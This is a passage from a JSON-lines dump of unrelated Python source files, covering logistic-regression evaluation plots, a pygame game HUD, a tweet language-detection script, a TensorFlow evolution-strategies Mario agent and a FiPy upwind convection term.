","sub_path":"eclipse-workspace/interview/src/problems/ReservoirSampling.py","file_name":"ReservoirSampling.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257695195","text":"from sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import f1_score\nfrom matplotlib import pyplot\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nimport numpy as np\nimport tensorflow as tf\nimport os\nimport time\n\ndef log(n):\n\t#try:\n\treturn math.log(n+1e-5)\n\ndef calculate_aic(n, mse, num_params):\n\taic = n * log(mse) + 2 * num_params\n\treturn aic\n\ndef calculate_bic(n, mse, num_params):\n\tbic = n * log(mse) + num_params * log(n)\n\treturn bic\n\ndef logistic_all(trainX, testX, trainy, testy, path, n):\n\tos.system('mkdir '+path)\n\tns_probs = [0 for _ in range(testy.shape[0])]\n\tmodel = LogisticRegression(solver='lbfgs',max_iter=1e10, tol=1e-16)\n\tmodel.fit(trainX, trainy)\n\n\t# predict probabilities, tol=1\n\tlr_probs = model.predict_proba(testX)\n\t# keep probabilities for the positive outcome only\n\tlr_probs = lr_probs[:, 1]\n\t# calculate scores\n\tns_auc = roc_auc_score(testy, ns_probs)\n\tlr_auc = roc_auc_score(testy, lr_probs)\n\t# calculate roc curves\n\tns_fpr, ns_tpr, _ = roc_curve(testy, ns_probs)\n\tlr_fpr, lr_tpr, _ = roc_curve(testy, lr_probs)\n\t# plot the roc curve for the model\n\tpyplot.plot(ns_fpr, ns_tpr, linestyle='--', label='No Skill')\n\tpyplot.plot(lr_fpr, lr_tpr, marker='.', label='Logistic')\n\t# axis labels\n\tpyplot.xlabel('False Positive Rate')\n\tpyplot.ylabel('True Positive Rate')\n\t# show the legend\n\tpyplot.legend()\n\t# show the plot\n\tyhat = model.predict(testX)\n\tmse = mean_squared_error(testy, yhat)\n\taic = calculate_aic(testy.shape[0], mse, 1)\n\tbic = calculate_bic(testy.shape[0], mse, 1)\n\tlr_precision, lr_recall, _ = precision_recall_curve(testy, lr_probs)\n\tlr_f1, lr_auc = f1_score(testy, yhat), auc(lr_recall, lr_precision)\n\n\tpyplot.savefig(path+'/roc.png')\n\tpyplot.clf()\n\tsf_2(trainX, testX, trainy, testy, path)\n\n\ttestX = (testX - np.min(trainX) + 1e-5)/(np.max(trainX) - np.min(trainX) + 1e-5)\n\ttrainX = (trainX - np.min(trainX) + 1e-5)/(np.max(trainX) - np.min(trainX) + 1e-5)\n\t\n\tmodel = tf.keras.models.Sequential([tf.keras.layers.Dense(1, activation='sigmoid')])\n\tmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\thistory = model.fit(trainX, trainy, epochs=n,verbose=0, validation_data=(testX, testy))\n\tstart = time.process_time()\n\t_, train_acc = model.evaluate(trainX, trainy, verbose=0)\n\t_, test_acc = model.evaluate(testX, testy, verbose=0)\n\ttime_taken = time.process_time() - start\n\n\tpredy = model.predict(trainX)\n\tresid = np.array([trainy[i] - predy[i] for i in range(trainy.shape[0])])\n\tll_fit = -np.sum(np.abs(resid))\n\tns_probs = [0 for _ in range(trainy.shape[0])]\n\tll_overall = -np.sum(np.array([trainy[i] - ns_probs[i] for i in range(trainy.shape[0])]))\n\tr2 = 1 - (ll_fit/ll_overall)\n\n\tpyplot.plot(history.history['accuracy'])\n\tpyplot.plot(history.history['val_accuracy'])\n\tpyplot.ylim([0, 1.1])\n\tpyplot.ylabel('accuracy')\n\tpyplot.xlabel('epoch')\n\tpyplot.legend(['accuracy', 'val_accuracy'], loc='lower right')\n\tpyplot.savefig(path+'/acc.png')\n\tpyplot.clf()\n\n\treturn ns_auc, lr_auc, lr_f1, train_acc, test_acc, mse, aic, bic, r2, time_taken/(trainX.shape[0]+testX.shape[0])\n\ndef sf_2(trainX, testX, trainy, testy, path):\n\tmodel = LogisticRegression(solver='lbfgs', max_iter=1e10)\n\tmodel.fit(trainX, trainy)\n\t# predict probabilities\n\tlr_probs = model.predict_proba(testX)\n\t# keep probabilities for the positive outcome only\n\tlr_probs = lr_probs[:, 1]\n\t# predict class values\n\tyhat = model.predict(testX)\n\tlr_precision, lr_recall, _ = precision_recall_curve(testy, lr_probs)\n\tlr_f1, lr_auc = f1_score(testy, yhat), auc(lr_recall, lr_precision)\n\t# summarize scores\n\t# plot the precision-recall curves\n\tno_skill = len(testy[testy==1]) / len(testy)\n\tpyplot.plot([0, 1], [no_skill, no_skill], linestyle='--', label='No Skill')\n\tpyplot.plot(lr_recall, lr_precision, marker='.', label='Logistic')\n\t# axis labels\n\tpyplot.xlabel('Recall')\n\tpyplot.ylabel('Precision')\n\t# show the legend\n\tpyplot.legend()\n\t# show the plot\n\tpyplot.savefig(path+'/precision.png')\n\tpyplot.clf()","sub_path":"supervised_learning/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"308433360","text":"import pygame, pygame.gfxdraw, math\n\n#Gui and Hud of the player\n#Displays the hp and mp bar\n#Displays the command menu\n#Displays the minimap\n\ndef getRootFolder(retracts=1):\n #retracts is how many times it goes up the file path branch\n path = __file__\n if \"\\\\\" in path: #Checks if device uses '\\' or '/' to navigate folders\n key = \"\\\\\"\n else:\n key = \"/\"\n path = path.split(key)\n for i in range(retracts):\n path.pop()\n path = key.join(path)\n return path\n\ndef setPath(path, pathList):\n if \"\\\\\" in path: #Checks if device uses '\\' or '/' to navigate folders\n key = \"\\\\\"\n else:\n key = \"/\"\n path = path.split(key)\n for i in range(len(pathList)):\n path.append(pathList[i])\n path = key.join(path)\n return path\n\n\nclass display:\n def __init__(self, surface, dimensions, debug=False):\n self.debug = debug\n self.surface = surface\n self.width = dimensions[0]\n self.length = dimensions[1]\n path = getRootFolder(2)\n self.font = pygame.font.Font(setPath(path,[\"assets\",\"fonts\",\"ability_Font.ttf\"]), 18)\n self.font2 = pygame.font.Font(setPath(path,[\"assets\",\"fonts\",\"Kh2_Menu_Font.ttf\"]), 12)\n self.frame = pygame.image.load(setPath(path,[\"assets\",\"player\",\"command_menu\",\"unselected.png\"]))\n self.frame_selected = pygame.image.load(setPath(path,[\"assets\",\"player\",\"command_menu\",\"selected.png\"]))\n self.frame_reaction = pygame.image.load(setPath(path,[\"assets\",\"player\",\"command_menu\",\"frame_reaction.png\"]))\n self.toolTipAnimation = [\"\"]\n if self.debug == True:\n self.colour = (0,0,0)\n else:\n self.colour = (0,0,0)\n\n def renderCMenu(self, commands=[], cooldowns=[], selected=0):\n x = 0\n y = self.length - 150\n \n #Load sprites\n \"Command title\"\n text = self.font2.render(\"COMMAND\", True, (220,80,130))\n sprite = pygame.Rect(x+14, y-24, 119, 29)\n location = text.get_rect()\n location.topleft = sprite.topleft\n self.surface.blit(text, location)\n for i in range (0, 4):\n if i != selected:\n self.surface.blit(self.frame, (x, y+34*i))\n image = self.frame_selected\n self.surface.blit(image, (x, y+34*selected))\n \n #Load text and cooldowns\n for i in range(len(commands)):\n if i < 4:\n if i != selected:\n sprite = pygame.Rect(x+25, y+34*i+10, 119, 29)\n colour = (170,170,170)\n cooldownSprite = pygame.Rect(x, y+34*i, 144, 42)\n else:\n sprite = pygame.Rect(x+40, y+34*i+10, 119, 29)\n colour = (255,255,255)\n cooldownSprite = pygame.Rect(x+12, y+34*i, 144, 42)\n text = self.font.render(commands[i], True, colour)\n location = text.get_rect()\n location.topleft = sprite.topleft\n self.surface.blit(text, location)\n \n def renderHud(self, miniMapData, hudData):\n #Interact box\n toolTip = hudData[2]\n if toolTip != self.toolTipAnimation[0]:\n self.toolTipAnimation = [toolTip,5]\n if toolTip != \"\":\n x = self.toolTipAnimation[1]\n self.surface.blit(self.frame_reaction, (x,self.length-220))\n if x == 15:\n toolTip = self.font.render(toolTip, True, (250,250,250))\n toolTipRect = toolTip.get_rect()\n toolTipRect.topleft = (x+19, self.length-205)\n self.surface.blit(toolTip, toolTipRect)\n if self.toolTipAnimation[1] < 15:\n self.toolTipAnimation[1] += 2\n if self.toolTipAnimation[1] >= 15:\n self.toolTipAnimation[1] = 15\n \n #Mana bar\n points,colour = self.calculateManaBar(hudData[1])\n pygame.draw.polygon(self.surface, (21,56,81), points[1]) #Background \n pygame.draw.polygon(self.surface, colour, points[0]) #Mana\n if self.debug == True:\n pygame.draw.lines(self.surface, self.colour, True, points[1], 2) #Frame\n \n #Health bar\n points,colour = self.calculateHealthBar(hudData[0])\n pygame.draw.polygon(self.surface, colour, points[0]) #Hp\n pygame.draw.lines(self.surface, self.colour, True, points[1], 2) #Frame\n\n #Mini Map\n miniMapRect = (self.width-174,30,144,144)\n borderWidth = 3\n clipRect = (miniMapRect[0]+borderWidth, miniMapRect[1]+borderWidth, miniMapRect[2]-borderWidth*2, miniMapRect[3]-borderWidth*2)\n xConstant = (miniMapRect[0]*2 + miniMapRect[2])/2\n yConstant = (miniMapRect[1]*2 + miniMapRect[3])/2\n pygame.draw.rect(self.surface, self.colour, miniMapRect, borderWidth)\n self.surface.set_clip(clipRect)\n #Dimensions of the map\n mapScale = 72/1500\n #Size of icons on the map\n sizeScale = 72/600\n enemies = (\"triangle\", \"square\")\n allies = (\"npc\", \"location\", \"player\")\n for i in range(len(miniMapData)):\n size = miniMapData[i][2]*sizeScale\n x = (-1*miniMapData[i][1][0]) * mapScale + xConstant - size/2\n y = (-1*miniMapData[i][1][1]) * mapScale + yConstant - size/2\n if miniMapData[i][0] in enemies:\n colour = (250,50,50)\n pygame.draw.rect(self.surface, colour, (x, y, size, size))\n \n elif miniMapData[i][0] in allies: \n if miniMapData[i][0] == \"location\":\n colour = miniMapData[i][3]\n pygame.draw.rect(self.surface, colour, (x, y, size, size), 2)\n x += size/2\n y += size/2\n radius = round(miniMapData[i][2] * 5 * mapScale)\n pygame.gfxdraw.aacircle(self.surface, round(x), round(y), radius-1, colour) #Draw zone range\n pygame.gfxdraw.aacircle(self.surface, round(x), round(y), radius, colour) #Make zone thicker\n\n else:\n colour = (50,250,50)\n if miniMapData[i][0] == \"player\":\n pygame.draw.rect(self.surface, (0,0,0), (x-2, y-2, size+4, size+4))\n if miniMapData[i][0] == \"npc\":\n colour = (50,250,50)\n pygame.draw.rect(self.surface, colour, (x, y, size, size))\n else: #Temporary online player\n colour = (50,250,50)\n #pygame.draw.rect(self.surface, (0,0,0), (x-2, y-2, size+4, size+4))\n #pygame.draw.rect(self.surface, colour, (x, y, size, size))\n \n #The player\n pygame.draw.rect(self.surface, self.colour, (xConstant-2.5, yConstant-2.5, 5,5))\n self.surface.set_clip()\n\n def calculateHealthBar(self, hpStats):\n percentage = hpStats[0]/hpStats[1]\n colour = (63,237,47)\n #HP bar, Frame\n points = [((self.width-20-170*percentage,self.length-68), (self.width-20,self.length-68), (self.width-20,self.length-38), (self.width-20-200*percentage,self.length-38)),\n ((self.width-190,self.length-68), (self.width-20,self.length-68), (self.width-20,self.length-38), (self.width-220,self.length-38))]\n return points, colour\n\n def calculateManaBar(self, mpStats):\n percentage = mpStats[0]/mpStats[1]\n if percentage > 0:\n colour =(66,167,244)\n else:\n percentage = abs(percentage)\n colour = (242,87,162)\n points = [((self.width-20-180*percentage,self.length-83), (self.width-20,self.length-83), (self.width-20,self.length-74), (self.width-20-170*percentage,self.length-74)),\n ((self.width-220,self.length-43), (self.width-200,self.length-83),\n (self.width-20,self.length-83), (self.width-20,self.length-73), (self.width-190,self.length-73))]\n return points, colour\n \n def update(self, commands=[], cooldowns=[], selected=0, miniMapData=[], hudData=((100,100),(100,100),\"test\")): #hudData = hp and mp\n self.renderCMenu(commands, cooldowns, selected)\n self.renderHud(miniMapData, hudData)\n \n","sub_path":"lib/LIMITinterface.py","file_name":"LIMITinterface.py","file_ext":"py","file_size_in_byte":8317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159686259","text":"from django.db.models import Q\nfrom googletrans import Translator\nfrom delab.models import Tweet\n\n\ndef run():\n tweets = Tweet.objects.filter(Q(language=\"unk\")).all()\n translator = Translator()\n for tweet in tweets:\n detected = translator.detect(tweet.text)\n print(\"dectted lang {}\".format(detected.lang))\n tweet.language = detected.lang\n tweet.save(update_fields=[\"language\"])\n","sub_path":"scripts/update_lang_conversation_tweets.py","file_name":"update_lang_conversation_tweets.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"23361685","text":"import numpy as np\nimport math as m\nimport os, random\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport tensorflow as tf\nfrom gym_super_mario_bros.actions import COMPLEX_MOVEMENT as POSSIBLE_ACTIONS\nfrom Optimizers import Adam\n\n# NES\nH_size = 150\nF_size = 3\nNF1_out = 4\nNF2_out = 8\nNF3_out = 12\nNF4_out = 16\nNF5_out = 32\nNF6_out = 64\nz_size = 726\nY_size = len(POSSIBLE_ACTIONS)\n\n# GA\nPASS_THROUGH = 10\n\ndef var(x):\n return tf.Variable(x, trainable=False)\n\nclass Param:\n def __init__(self, initial_mean, population_size, sigma):\n self.population_size = population_size\n self.mean = var(initial_mean)\n self.population = []\n\n # during visualization we use the initial_mean as the only parameters in the population\n if population_size == 1:\n self.population = [self.mean]\n\n # initialize population\n for _ in range(self.population_size//2):\n jitter = tf.random.normal(self.mean.shape, stddev=sigma)\n self.population.append(jitter + self.mean)\n self.population.append(self.mean - jitter)\n\n self.set_current_population_member(0)\n\n # change reference to current tensor\n def set_current_population_member(self, i):\n self.current = self.population[i]\n\n def get_grad(self, reward):\n jitter = self.population[0] - self.mean\n grad = jitter * reward[0]\n for i in range(1,self.population_size):\n jitter = self.population[i] - self.mean\n grad += jitter * reward[i]\n return grad\n\n def gen_pop_about_mean(self, sigma):\n for i in range(self.population_size//2):\n jitter = tf.random.normal(self.mean.shape, stddev=sigma)\n self.population[2*i+0] = jitter + self.mean\n self.population[2*i+1] = self.mean - jitter\n\nclass Parameters:\n def __init__(self, population_size=1, sigma=0, alpha=0, filename=''):\n self.population_size = population_size\n self.sigma = sigma\n self.alpha = alpha\n self.optimizer = Adam()\n\n if filename:\n npz = np.load(filename)\n self.F1 = Param(npz['arr_0'], population_size, sigma)\n self.F2 = Param(npz['arr_1'], population_size, sigma)\n self.F3 = Param(npz['arr_2'], population_size, sigma)\n self.F4 = Param(npz['arr_3'], population_size, sigma)\n self.F5 = Param(npz['arr_4'], population_size, sigma)\n self.F6 = Param(npz['arr_5'], population_size, sigma)\n\n self.g3 = Param(npz['arr_6'], population_size, sigma)\n self.b3 = Param(npz['arr_7'], population_size, sigma)\n self.g4 = Param(npz['arr_8'], population_size, sigma)\n self.b4 = Param(npz['arr_9'], population_size, sigma)\n self.g5 = Param(npz['arr_10'], population_size, sigma)\n self.b5 = Param(npz['arr_11'], population_size, sigma)\n self.g6 = Param(npz['arr_12'], population_size, sigma)\n self.b6 = Param(npz['arr_13'], population_size, sigma)\n\n self.Wx0 = Param(npz['arr_14'], population_size, sigma)\n self.bx0 = Param(npz['arr_15'], population_size, sigma)\n self.Wx1 = Param(npz['arr_16'], population_size, sigma)\n self.bx1 = Param(npz['arr_17'], population_size, sigma)\n self.Wx2 = Param(npz['arr_18'], population_size, sigma)\n self.bx2 = Param(npz['arr_19'], population_size, sigma)\n self.Wv = Param(npz['arr_20'], population_size, sigma)\n self.bv = Param(npz['arr_21'], population_size, sigma)\n\n self.lg0 = Param(npz['arr_22'], population_size, sigma)\n self.lb0 = Param(npz['arr_23'], population_size, sigma)\n self.lg1 = Param(npz['arr_24'], population_size, sigma)\n self.lb1 = Param(npz['arr_25'], population_size, sigma)\n self.lg2 = Param(npz['arr_26'], population_size, sigma)\n self.lb2 = Param(npz['arr_27'], population_size, sigma)\n else:\n # filter weight is whdo\n # w = width\n # h = height\n # d = depth (in channels)\n # o = out depth (out channels)?\n self.F1 = Param(tf.random.normal([F_size,F_size,3,NF1_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.F2 = Param(tf.random.normal([F_size,F_size,NF1_out,NF2_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.F3 = Param(tf.random.normal([F_size,F_size,NF2_out,NF3_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.g3 = Param(tf.ones((NF3_out,1)), population_size, sigma)\n self.b3 = Param(tf.zeros((NF3_out,1)), population_size, sigma)\n self.F4 = Param(tf.random.normal([F_size,F_size,NF3_out,NF4_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.g4 = Param(tf.ones((NF4_out,1)), population_size, sigma)\n self.b4 = Param(tf.zeros((NF4_out,1)), population_size, sigma)\n self.F5 = Param(tf.random.normal([F_size,F_size,NF4_out,NF5_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.g5 = Param(tf.ones((NF5_out,1)), population_size, sigma)\n self.b5 = Param(tf.zeros((NF5_out,1)), population_size, sigma)\n self.F6 = Param(tf.random.normal([F_size,F_size,NF5_out,NF6_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.g6 = Param(tf.ones((NF6_out,1)), population_size, sigma)\n self.b6 = Param(tf.zeros((NF6_out,1)), population_size, sigma)\n\n self.lg0 = Param(tf.ones((H_size,1)), population_size, sigma)\n self.lb0 = Param(tf.zeros((H_size,1)), population_size, sigma)\n self.lg1 = Param(tf.ones((H_size,1)), population_size, sigma)\n self.lb1 = Param(tf.zeros((H_size,1)), population_size, sigma)\n self.lg2 = Param(tf.ones((H_size,1)), population_size, sigma)\n self.lb2 = Param(tf.zeros((H_size,1)), population_size, sigma)\n\n self.Wx0 = Param(tf.random.normal([H_size * 4, z_size]), population_size, sigma)\n self.bx0 = Param(tf.zeros([H_size * 4, 1]), population_size, sigma)\n self.Wx1 = Param(tf.random.normal([H_size * 4, H_size*2]), population_size, sigma)\n self.bx1 = Param(tf.zeros([H_size * 4, 1]), population_size, sigma)\n self.Wx2 = Param(tf.random.normal([H_size * 4, H_size*2]), population_size, sigma)\n self.bx2 = Param(tf.zeros([H_size * 4, 1]), population_size, sigma)\n self.Wv = Param(tf.random.normal([Y_size, H_size]), population_size, sigma)\n self.bv = Param(tf.zeros([Y_size, 1]), population_size, sigma)\n\n def all(self):\n return [self.F1, self.F2, self.F3, self.F4, self.F5, self.F6,\\\n self.g3, self.b3, self.g4, self.b4, self.g5, self.b5, self.g6, self.b6,\\\n self.Wx0, self.bx0, self.Wx1, self.bx1, self.Wx2, self.bx2,\\\n self.Wv, self.bv,\\\n self.lg0,self.lb0,self.lg1,self.lb1,self.lg2,self.lb2]\n\n # return reference to current tensors\n def current(self):\n return [param.current for param in self.all()]\n\n def set_current_population_member(self, i):\n for param in self.all():\n param.set_current_population_member(i)\n\n def update_nes(self, reward, reward_mean, reward_std):\n reward = (reward-reward_mean)/(reward_std+.00001)\n grads = []\n means = []\n for param in self.all():\n grads += [param.get_grad(reward) * (self.alpha / (self.population_size*self.sigma))]\n means += [param.mean]\n self.optimizer.update(means, grads)\n for param in self.all():\n param.gen_pop_about_mean(self.sigma)\n\n def mutate(self, param, i):\n x = param.population[i]\n if random.randint(1,4) == 1:\n jitter = tf.random.normal(x.shape, stddev=self.sigma)\n return x + jitter\n else:\n return x\n\n def mate(self, param, i, j):\n if random.randint(1,4) == 1:\n return self.mutate(param, i)\n else:\n return self.mutate(param, j)\n\n def update_ga(self, rewards):\n # sort parameters by rewards\n top_reward_indices = rewards.argsort()[-PASS_THROUGH:]\n top_reward_indices = top_reward_indices[::-1]\n for param in self.all():\n # sort population\n for i,j in enumerate(top_reward_indices):\n param.population[i] = param.population[j]\n # generate new population\n for k in range(PASS_THROUGH,self.population_size):\n param.population[k] = self.mate(param, random.randint(0,9), random.randint(0,9))\n\n# For visualization\nimport viridis\ncmap = viridis.Viridis().getmap()\ndef post_process_activations(a):\n for i in range(len(a)):\n a[i] = tf.image.resize(a[i], (256,256), method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n for i in range(len(a)):\n mx = tf.reduce_max(a[i])\n mn = tf.reduce_min(a[i])\n a[i]=tf.cast(255.*(a[i]-mn)/(mx-mn+.00001), tf.int32)\n for i in range(len(a)):\n a[i]=255.*tf.gather(params=cmap,indices=a[i])[:,:,0,:]\n return a\n\ndef gnorm(x, gamma, beta, G, eps=1e-5):\n N, H, W, C = x.get_shape().as_list()\n G = min(G, C)\n x = tf.reshape(x, [N, H, W, G, C // G])\n mean, var = tf.nn.moments(x, [1, 2, 4], keepdims=True)\n x = (x - mean) / tf.sqrt(var + eps)\n gamma = tf.reshape(gamma,[1,1,1,C])\n beta = tf.reshape(beta,[1,1,1,C])\n x = tf.reshape(x, [N, H, W, C]) * gamma + beta\n return x\n\ndef lnorm(x, gamma, beta, eps=1e-5):\n mean, var = tf.nn.moments(x,[0],keepdims=True)\n x=(x-mean)/tf.sqrt(var+eps)\n return x * gamma + beta\n\ndef conv(x,F,S):\n x = tf.nn.conv2d(x, F, strides=[1,1,1,1], padding='VALID')\n print('x:',x.shape)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x,2,(1,1),padding='VALID')\n S=S//2\n x = tf.image.resize(x, (S,S))\n print('x:',x.shape)\n return x, S\n\ndef lstm(x,h,c,W,b,lg,lb):\n hx = tf.concat((x,h), axis=0)\n print('hx:',hx.shape)\n z = tf.matmul(W, hx) + b\n print('z:',z.shape)\n i, f, o, cp = tf.split(z, axis=0, num_or_size_splits=4)\n print('i:{}\\nf:{}\\no:{}\\ncp:{}'.format(i.shape,f.shape,o.shape,cp.shape))\n i = tf.nn.sigmoid(lnorm(i,lg,lb))\n f = tf.nn.sigmoid(lnorm(f,lg,lb))\n o = tf.nn.sigmoid(lnorm(o,lg,lb))\n c = lnorm(f * c + i * tf.nn.tanh(lnorm(cp,lg,lb)),lg,lb)\n h = o * tf.nn.tanh(c)\n return h, c\n\n# see tf.function docs section 'When to retrace?'\n@tf.function\ndef forward(observation,\\\n h0,c0,\\\n h1,c1,\\\n h2,c2,\\\n F1,F2,F3,\\\n F4,F5,F6,\\\n g3,b3,\\\n g4,b4,\\\n g5,b5,\\\n g6,b6,\\\n Wx0,bx0,\\\n Wx1,bx1,\\\n Wx2,bx2,\\\n Wv,bv,\\\n lg0,lb0,\\\n lg1,lb1,\\\n lg2,lb2,\n visualize=False):\n\n print('inputs:',observation)\n x = observation[35:215,38:256-38]/255.\n print('x:',x.shape)\n S,_,_ = x.shape\n\n activations = [None]*31\n\n x,S = conv([x],F1,S)\n x,S = conv(x,F2,S)\n if visualize:\n activations[0] = x[0,:,:,0][:,:,None]\n activations[1] = x[0,:,:,3][:,:,None]\n activations[2] = x[0,:,:,4][:,:,None]\n activations[3] = x[0,:,:,5][:,:,None]\n x,S = conv(x,F3,S)\n x = gnorm(x,g3,b3,G=4)\n if visualize:\n activations[4] = x[0,:,:,0][:,:,None]\n activations[5] = x[0,:,:,1][:,:,None]\n activations[6] = x[0,:,:,2][:,:,None]\n activations[7] = x[0,:,:,3][:,:,None]\n activations[8] = x[0,:,:,4][:,:,None]\n activations[9] = x[0,:,:,5][:,:,None]\n activations[10] = x[0,:,:,6][:,:,None]\n activations[11] = x[0,:,:,7][:,:,None]\n activations[12] = x[0,:,:,8][:,:,None]\n activations[13] = x[0,:,:,9][:,:,None]\n activations[14] = x[0,:,:,10][:,:,None]\n activations[15] = x[0,:,:,11][:,:,None]\n x,S = conv(x,F4,S)\n x = gnorm(x,g4,b4,G=4)\n if visualize:\n activations[16] = x[0,:,:,0][:,:,None]\n activations[17] = x[0,:,:,1][:,:,None]\n activations[18] = x[0,:,:,2][:,:,None]\n activations[19] = x[0,:,:,3][:,:,None]\n activations[20] = x[0,:,:,4][:,:,None]\n activations[21] = x[0,:,:,5][:,:,None]\n activations[22] = x[0,:,:,6][:,:,None]\n activations[23] = x[0,:,:,7][:,:,None]\n activations[24] = x[0,:,:,8][:,:,None]\n activations[25] = x[0,:,:,9][:,:,None]\n activations[26] = x[0,:,:,10][:,:,None]\n x,S = conv(x,F5,S)\n x = gnorm(x,g5,b5,G=8)\n x = tf.nn.conv2d(x, F6, strides=[1,1,1,1], padding='VALID')\n x = gnorm(x,g6,b6,G=16)\n if visualize:\n activations[27] = x[0,:,:,0][:,:,None]\n activations[28] = x[0,:,:,1][:,:,None]\n print('x:',x.shape)\n x = tf.nn.relu(x)\n\n x = tf.reshape(x, [-1, 1]) # flatten\n print('x:',x.shape)\n\n h0,c0 = lstm(x,h0,c0,Wx0,bx0,lg0,lb0)\n h1,c1 = lstm(h0,h1,c1,Wx1,bx1,lg1,lb1)\n h2,c2 = lstm(h1,h2,c2,Wx2,bx2,lg2,lb2)\n a = tf.matmul(Wv, h2) + bv\n\n a = tf.argmax(a)\n\n if visualize:\n activations[29] = tf.reshape(tf.concat((h0,h1,h2),axis=0)[:289], (17,17))[:,:,None]\n activations[30] = tf.reshape(tf.concat((c0,c1,c2),axis=0)[:289], (17,17))[:,:,None]\n activations = post_process_activations(activations)\n observation = tf.image.resize(observation, (256,256), method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n return h0,c0,h1,c1,h2,c2,a,activations+[observation],\n else:\n return h0,c0,h1,c1,h2,c2,a\n\nclass Model:\n def __init__(self, population_size, observation, params, visualize=False):\n # TODO what is 6 here? (2 vectors for each lstm layer (have 3 lstm layers))\n self.population_size = population_size\n self.rnn_states = [[tf.zeros((H_size,1)) for _ in range(6)] for _ in range(population_size)]\n self.params = params\n\n # forward once just to compile the graph\n forward(observation, *(self.rnn_states[0]), *params.current(), visualize)\n\n # whether to store activations for visualization\n self.visualize = visualize\n\n def __call__(self, observation, env_id):\n self.params.set_current_population_member(env_id)\n if self.visualize:\n *self.rnn_states[env_id], action, activations = forward(observation, *self.rnn_states[env_id], *self.params.current(), visualize=True)\n return action.numpy()[0], activations\n else:\n *self.rnn_states[env_id], action = forward(observation, *self.rnn_states[env_id], *self.params.current())\n return action.numpy()[0]\n\n def reset_rnn_states(self):\n self.rnn_states = [[tf.zeros((H_size,1)) for _ in range(6)] for _ in range(self.population_size)]\n\n\n\n\n\n# def gnorm(x, gamma, beta, G, eps=1e-5):\n# # normalize\n# # transpose: [bs, h, w, c] to [bs, c, h, w] folloing the paper\n# x = tf.transpose(x, [0,3,1,2])\n# N,C,H,W=x.shape\n# G=min(G,C)\n# x=tf.reshape(x,[-1,G,C//G,H,W])\n# mean, var = tf.nn.moments(x,[2,3,4],keepdims=True)\n# x=(x-mean)/tf.sqrt(var+eps)\n# # per channel gamma and beta\n# gamma = tf.reshape(gamma,[1,C,1,1])\n# beta = tf.reshape(beta,[1,C,1,1])\n# output = tf.reshape(x,[-1,C,H,W]) * gamma + beta\n# return tf.transpose(output, [0,2,3,1])\n\n\n\n","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":15251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"444017498","text":"#!/usr/bin/env python\n\n## -*-Pyth-*-\n # ###################################################################\n # FiPy - Python-based finite volume PDE solver\n # \n # FILE: \"baseUpwindConvectionTerm.py\"\n #\n # Author: Jonathan Guyer \n # mail: NIST\n # www: http://www.ctcms.nist.gov/fipy/\n # \n # ========================================================================\n # This software was developed at the National Institute of Standards\n # and Technology by employees of the Federal Government in the course\n # of their official duties. Pursuant to title 17 Section 105 of the\n # United States Code this software is not subject to copyright\n # protection and is in the public domain. FiPy is an experimental\n # system. NIST assumes no responsibility whatsoever for its use by\n # other parties, and makes no guarantees, expressed or implied, about\n # its quality, reliability, or any other characteristic. We would\n # appreciate acknowledgement if the software is used.\n # \n # This software can be redistributed and/or modified freely\n # provided that any derivative works bear some notice that they are\n # derived from it, and any modified versions bear some notice that\n # they have been modified.\n # ========================================================================\n # See the file \"license.terms\" for information on usage and redistribution\n # of this file, and for a DISCLAIMER OF ALL WARRANTIES.\n # \n # ###################################################################\n ##\n\n__docformat__ = 'restructuredtext'\n\n__all__ = []\n\nfrom fipy.terms.abstractConvectionTerm import _AbstractConvectionTerm\nfrom fipy.variables.faceVariable import FaceVariable\nfrom fipy.tools.dimensions.physicalField import PhysicalField\nfrom fipy.tools import inline\nfrom fipy.tools import numerix\n\nclass _UpwindConvectionTermAlpha(FaceVariable):\n def __init__(self, P):\n FaceVariable.__init__(self, mesh=P.mesh, elementshape=P.shape[:-1])\n self.P = self._requires(P)\n\n if inline.doInline:\n def _calcValue(self):\n P = self.P.numericValue\n alpha = self._array.copy()\n\n inline._runInline(\"\"\"\n alpha[i] = 0.5;\n\n if (P[i] > 0.) {\n alpha[i] = 1.;\n } else {\n alpha[i] = 0.;\n }\n \"\"\",\n alpha=alpha, P=P,\n ni = len(P.flat))\n\n return self._makeValue(value=alpha)\n else:\n def _calcValue(self):\n P = self.P.numericValue\n alpha = numerix.where(P > 0., 1., 0.)\n return PhysicalField(value=alpha)\n\nclass _AbstractUpwindConvectionTerm(_AbstractConvectionTerm):\n def _alpha(self, P):\n return _UpwindConvectionTermAlpha(P)\n\ndef _test(): \n import fipy.tests.doctestPlus\n return fipy.tests.doctestPlus.testmod()\n \nif __name__ == \"__main__\": \n _test() \n","sub_path":"Class Project/FiPy-3.1.3 2/fipy/terms/abstractUpwindConvectionTerm.py","file_name":"abstractUpwindConvectionTerm.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"518410815","text":"# encoding: utf-8\n\n\nclass 